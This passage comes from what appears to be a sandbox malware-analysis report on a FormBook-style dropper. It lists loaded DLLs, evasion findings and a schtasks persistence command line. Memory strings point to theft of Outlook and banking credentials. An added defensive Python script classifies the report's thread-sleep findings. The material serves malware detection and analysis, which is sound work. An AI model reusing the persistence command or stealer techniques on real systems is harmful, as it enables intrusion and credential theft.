                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: n2pGr8w21V.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: n2pGr8w21V.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: n2pGr8w21V.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: systray.pdb source: RegSvcs.exe, 0000000F.00000002.1575865411.0000000001107000.00000004.00000020.00020000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000016.00000002.2510055653.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 0000000F.00000002.1575865411.0000000001107000.00000004.00000020.00020000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000016.00000002.2510055653.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ISaSZznjXcpoJ.exe, 00000016.00000002.2507158297.000000000081E000.00000002.00000001.01000000.0000000E.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2509185482.000000000081E000.00000002.00000001.01000000.0000000E.sdmp
                Source: Binary string: RegSvcs.pdb, source: systray.exe, 00000017.00000002.2508850216.0000000003522000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512922275.000000000582C000.00000004.10000000.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511948810.000000000289C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.1878823883.00000000353FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: OavGB.pdb source: n2pGr8w21V.exe, uEugNEto.exe.0.dr
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000003.1575412489.0000000004EAD000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512370768.000000000539E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512370768.0000000005200000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000003.1577378357.000000000505A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000003.1575412489.0000000004EAD000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512370768.000000000539E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512370768.0000000005200000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000003.1577378357.000000000505A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: systray.exe, 00000017.00000002.2508850216.0000000003522000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512922275.000000000582C000.00000004.10000000.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511948810.000000000289C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.1878823883.00000000353FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: OavGB.pdbSHA256g source: n2pGr8w21V.exe, uEugNEto.exe.0.dr
                Source: n2pGr8w21V.exeStatic PE information: 0x8BCFF9D5 [Sat Apr 30 21:02:13 2044 UTC]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004071DE push 6FB25C47h; retf 15_2_004071E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004031B0 push eax; ret 15_2_004031B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0040B9B7 push ebp; retf 15_2_0040B9BE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004172E9 push dword ptr [esi+eax*2+5Fh]; retf 15_2_004172F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_004133E3 push ss; retn A658h15_2_0041350B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00414BF2 push edi; ret 15_2_00414C12
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00414C28 push edi; ret 15_2_00414C12
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00418D95 pushfd ; retf 15_2_00418DAD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00415661 push edx; iretd 15_2_00415662
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0156225F pushad ; ret 15_2_015627F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015627FA pushad ; ret 15_2_015627F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_015909AD push ecx; mov dword ptr [esp], ecx15_2_015909B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0156283D push eax; iretd 15_2_01562858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0156135E push eax; iretd 15_2_01561369
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_05754C35 pushfd ; retf 17_2_05754C41
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_0575F1A0 push eax; retf 17_2_0575F1A1
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_0575B1AF push eax; mov dword ptr [esp], edx17_2_0575B1C4
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exeCode function: 17_2_0575DCA0 push esp; ret 17_2_0575DCA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_0140C54D pushfd ; ret 21_2_0140C54E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_0140C54F push 8B013967h; ret 21_2_0140C554
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_013C09AD push ecx; mov dword ptr [esp], ecx21_2_013C09B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_0140C9D7 push edi; ret 21_2_0140C9D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_01391FEC push eax; iretd 21_2_01391FED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_01417E99 push ecx; ret 21_2_01417EAC
                Source: n2pGr8w21V.exeStatic PE information: section name: .text entropy: 7.249824395566697
                Source: uEugNEto.exe.0.drStatic PE information: section name: .text entropy: 7.249824395566697
                Source: C:\Users\user\Desktop\n2pGr8w21V.exeFile created: C:\Users\user\AppData\Roaming\uEugNEto.exeJump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\n2pGr8w21V.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp"

Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe Process information set: NOOPENFILEERRORBOX (45 consecutive identical entries)
                Source: C:\Windows\SysWOW64\systray.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 consecutive identical entries)

                Malware Analysis System Evasion

                Source: Yara match, File source: Process Memory Space: n2pGr8w21V.exe PID: 2620, type: MEMORYSTR
                Source: Yara match, File source: Process Memory Space: uEugNEto.exe PID: 7852, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\systray.exe API/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\systray.exe API/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\systray.exe API/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\systray.exe API/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\systray.exe API/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\systray.exe API/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\systray.exe API/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\systray.exe API/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe Memory allocated: 1290000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe Memory allocated: 2EB0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe Memory allocated: 4EB0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe Memory allocated: 9470000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe Memory allocated: A470000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe Memory allocated: A690000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe Memory allocated: B690000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe Memory allocated: 1570000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe Memory allocated: 3080000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe Memory allocated: 2EA0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe Memory allocated: 92A0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe Memory allocated: A2A0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe Memory allocated: A4B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe Memory allocated: B4B0000 memory reserve | memory write watch
                Note (editor's caveat, not a report signature): MEM_WRITE_WATCH is also the flag the .NET CLR uses when it reserves its garbage-collector heap segments, so "memory reserve | memory write watch" fires on ordinary managed executables. On their own these reservations are weak evidence of sandbox evasion; they only carry weight alongside the injection and sleep-loop findings on this page.
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 15_2_015D096E rdtsc 15_2_015D096E
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2951
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4061
                Source: C:\Windows\SysWOW64\systray.exe Window / User API: threadDelayed 9794
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 0.7 %
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe API coverage: 0.3 %
                Source: C:\Users\user\Desktop\n2pGr8w21V.exe TID: 6364 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7592 Thread sleep count: 2951 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724 Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7680 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7732 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7700 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Users\user\AppData\Roaming\uEugNEto.exe TID: 7928 Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\systray.exe TID: 2020 Thread sleep count: 180 > 30
                Source: C:\Windows\SysWOW64\systray.exe TID: 2020 Thread sleep time: -360000s >= -30000s
                Source: C:\Windows\SysWOW64\systray.exe TID: 2020 Thread sleep count: 9794 > 30
                Source: C:\Windows\SysWOW64\systray.exe TID: 2020 Thread sleep time: -19588000s >= -30000s
                Source: C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe TID: 2980 Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\systray.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\systray.exe Last function: Thread delayed
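An added triage script, not part of the Joe Sandbox report, for the "Thread sleep" lines above. The signature group mixes two different things. The per-thread totals for n2pGr8w21V.exe, uEugNEto.exe and the powershell.exe threads are 922337203685477 or a small multiple of it; that number is 2^63 / 10^4, the millisecond value of the LLONG_MIN relative interval that Sleep(INFINITE) hands to NtDelayExecution, so those threads are parked indefinitely rather than stalling the sandbox, and a multiple means the report summed several such waits on one thread. The systray.exe thread 2020, by contrast, issues 9794 sleeps totalling 19588000 (2000 each), which is a real sleep loop in the FormBook-injected process. The script assumes the report's "s" suffix is really milliseconds (the magnitudes only make sense that way), and its sample lines are constructed to match the shape of the findings on this page.

```python
import re
from collections import defaultdict

# Sleep(INFINITE) reaches the kernel as an NtDelayExecution relative interval of
# LLONG_MIN (0x8000000000000000) in 100 ns units; in milliseconds that is
# 2**63 // 10**4 = 922337203685477, the value the report prints for the parked
# n2pGr8w21V.exe, uEugNEto.exe and powershell.exe threads (or a multiple of it).
INFINITE_MS = (1 << 63) // 10_000

# Assumption: the report's "s" suffix is milliseconds. Thresholds mirror the
# ">= -30000s" and "> 30" comparisons the report itself prints.
MIN_COUNT = 30
MIN_TOTAL_MS = 30_000

# Tolerates both "TID: 2020Thread sleep" (fused cells) and "TID: 2020 Thread sleep".
LINE_RE = re.compile(
    r"Source:\s*(?P<proc>\S.*?)\s*TID:\s*(?P<tid>\d+)\s*"
    r"Thread sleep (?P<kind>count|time):\s*-?(?P<val>\d+)"
)

# Constructed sample lines, copied in shape from the findings above.
SAMPLE = r"""
Source: C:\Users\user\Desktop\n2pGr8w21V.exe TID: 6364 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7592 Thread sleep count: 2951 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7724 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\systray.exe TID: 2020 Thread sleep count: 180 > 30
Source: C:\Windows\SysWOW64\systray.exe TID: 2020 Thread sleep time: -360000s >= -30000s
Source: C:\Windows\SysWOW64\systray.exe TID: 2020 Thread sleep count: 9794 > 30
Source: C:\Windows\SysWOW64\systray.exe TID: 2020 Thread sleep time: -19588000s >= -30000s
"""


def parse(lines):
    """Collect the largest sleep count and total per (process, TID)."""
    per_tid = defaultdict(lambda: {"count": 0, "time_ms": 0})
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        key = (m["proc"], int(m["tid"]))
        field = "count" if m["kind"] == "count" else "time_ms"
        # The report re-emits a thread's line as its totals grow (systray.exe
        # TID 2020 appears with 180 and later 9794 sleeps); keep the final snapshot.
        per_tid[key][field] = max(per_tid[key][field], int(m["val"]))
    return dict(per_tid)


def classify(count, time_ms):
    """Label one thread's sleep behaviour."""
    whole, rest = divmod(time_ms, INFINITE_MS)
    if whole and rest == 0:
        # An exact multiple of the INFINITE interval: blocked thread(s), no evasion.
        return f"infinite wait x{whole}: parked thread, not a timing evasion"
    if count >= MIN_COUNT and time_ms >= MIN_TOTAL_MS:
        return (f"sleep loop: {count} sleeps, avg {time_ms / count:.0f} ms, "
                f"total {time_ms / 1000:.0f} s")
    if count >= MIN_COUNT:
        return f"{count} sleeps, no total reported"
    return "below thresholds"


def triage(report_text):
    """Map 'process TID n' -> verdict for every thread found in the text."""
    return {f"{proc} TID {tid}": classify(v["count"], v["time_ms"])
            for (proc, tid), v in parse(report_text.splitlines()).items()}


if __name__ == "__main__":
    for thread, verdict in triage(SAMPLE).items():
        print(f"{thread}: {verdict}")
```

Run against the full "Thread sleep" block of a report, the output separates the parked PowerShell worker threads from the one thread that actually burns sandbox time; the latter is the line worth correlating with the systray.exe injection findings.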
                Source: systray.exe, 00000017.00000002.2514817547.0000000008447000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware20,11696492231n
                Source: H846yjBj.23.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: H846yjBj.23.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
